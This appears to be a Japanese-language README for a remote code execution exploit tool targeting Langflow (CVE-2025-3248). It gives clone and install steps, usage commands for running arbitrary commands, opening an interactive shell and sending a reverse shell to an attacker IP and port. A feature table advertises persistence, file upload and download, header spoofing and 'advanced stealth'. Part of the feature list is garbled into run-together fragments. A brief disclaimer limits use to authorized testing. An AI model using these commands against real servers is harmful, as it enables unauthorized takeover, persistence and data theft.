
Langflow用リモートコード実行エクスプロイト (CVE-2025-3248) - [ S4Tech作 ]
Langflow 向けリモートコード実行エクスプロイト (CVE-2025-3248)
persistコマンド)upload local_path remote_pathdownload remote_path local_pathclear コマンド(端末クリア)User-AgentX-Forwarded-For IPexploit_log.txt).langflow_shell_history)requestscoloramareadlinegit clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
python exploit.py <URL> [options]
python exploit.py http://target.com
python exploit.py http://target.com --shell
python exploit.py http://target.com --command "whoami"
python exploit.py http://target.com --reverse 192.168.1.100 4444
Image.png)
⚠️ このツールは教育目的および許可されたテスト目的のみで使用してください。
⚠️ 自分が所有していない、またはテスト許可を得ていないシステムに対する不正使用は違法です。
このプロジェクトはMITライセンスの下で提供されています。詳細は LICENSE ファイルを参照してください。
プルリクエストは歓迎します。大きな変更を行う場合は、まずIssueを開いて変更内容について議論してください。
| 機能 | v1.0 | v2.0 |
|---|
| ペイロード手法 | 1 | 5 |
| ファイル転送 | ❌ 非対応 | ✅ 対応 |
| 持続性 | ❌ | ✅ |
| ステルスレベル | 基本 | 高度 |
| セッションログ | ❌ | ✅ |
| オプション | 説明 |
|---|
--shell | 対話型シェルを開始 |
--reverse IP PORT | 指定されたIP:PORTにリバースシェルを送信 |
--command CMD | 単一コマンドを実行 |
--verbose | 詳細出力を有効化 |
--timeout SEC | リクエストタイムアウトを設定(デフォルト: 10秒) |